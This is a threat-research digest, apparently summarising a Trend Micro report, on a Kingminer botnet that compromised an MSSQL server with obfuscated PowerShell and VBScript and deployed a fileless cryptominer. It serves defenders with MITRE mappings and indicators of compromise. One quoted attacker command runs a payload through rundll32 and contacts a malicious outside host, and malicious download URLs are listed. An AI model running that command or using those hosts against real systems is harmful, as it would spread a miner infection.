Threat Research

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR

Securonix

Trend Micro’s Managed XDR investigated a Kingminer botnet attack that targeted an MSSQL server by abusing obfuscated PowerShell and VBScript, leading to a fileless miner deployment. The findings trace the attack chain from initial exploitation through payload downloads and memory-only execution, including BlueKeep (CVE-2019-0708) checks and the emphasis on patching exposed servers and enhancing network monitoring. #Kingminer #BlueKeep #CVE-2019-0708 #PowerShell #VBScript #TrendMicroVisionOne

Keypoints

  • Kingminer botnet activity targeted SQL servers for cryptocurrency mining, with references tracing back to prior reports from 2018–2020 and a noted resurgence in mid-2020‑era activity.
  • A Microsoft SQL server process created an obfuscated PowerShell command, indicating remote code execution via a compromised MSSQL instance.
  • A VBScript file named %PUBLIC%gfghhjhyuq.vbs was executed through sqlservr.exe, pointing to multiple script-based infection stages.
  • The malware chain downloads a 32‑bit or 64‑bit PowerShell binary from a GitHub repository and saves it as sysdo.exe for execution.
  • Subsequent fileless activity uses Invoke-Expression to run additional PowerShell scripts downloaded from generated URLs, enabling memory-based execution.
  • The attackers leverage rundll32 (via main.cpl) to launch payloads in memory and reach a known malicious domain to retrieve further components.
  • BlueKeep (CVE-2019-0708) vulnerability checks are performed by assessing Windows version and hotfix presence; if unpatched, RDP access is disabled to continue compromise.

MITRE Techniques

  • [T1046] Network Service Scanning – The team used Shodan and Censys to see exposed services such as RDP and SQL and validate missing patches on any machine. ‘Using a search engine for internet of things (IoT) devices like Shodan and Censys, the team was able to both see exposed services such as RDP and SQL and validate missing patches on any machine.’
  • [T1059.001] PowerShell – a Microsoft SQL server process created an obfuscated PowerShell command. ‘a Microsoft SQL server process created an obfuscated PowerShell command.’
  • [T1059.005] VBScript – A VBScript file named %PUBLIC%gfghhjhyuq.vbs executed through sqlservr.exe. ‘A VBScript file named %PUBLIC%gfghhjhyuq.vbs executed through sqlservr.exe.’
  • [T1105] Ingress Tool Transfer – downloads a standalone PowerShell binary from a raw file stored in a GitHub user’s repository. ‘downloads a standalone PowerShell binary from a raw file stored in a GitHub user’s repository.’
  • [T1218.011] Rundll32 – rundll32 is used to launch payloads in memory via main.cpl. ‘”C:WindowsSystem32rundll32.exe” Shell32.dll,Control_RunDLL “C:Windowssystem32main.cpl” -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99I*X)’
  • [T1210] Exploitation of Remote Services – BlueKeep vulnerability checks (CVE-2019-0708) are performed; if unpatched, the system is vulnerable and the attacker proceeds. ‘If it finds that none of the hotfixes is present, this means that it is vulnerable to the BlueKeep vulnerability assigned as CVE-2019-0708.’

Indicators of Compromise

  • [SHA256] context – 0CF6882D750EEA945A9B239DFEAC39F65EFD91B3D0811159707F1CEC6CD80CC0, CB29887A45AEA646D08FA16B67A24848D8811A5F2A18426C77BEAAE9A0B14B86
  • [URL] context – http://ww.3113cfdae.com/eb.txt, http://qqqe.1eaba4fdae.com/
  • [Domain] context – ww.3113cfdae.com, qqqe.1eaba4fdae.com
  • [File] context – gfghhjhyuq.vbs, sysdo.exe
  • [File path] context – C:WindowsTempsysdo.exe, C:Windowssystem32main.cpl

Read more: https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html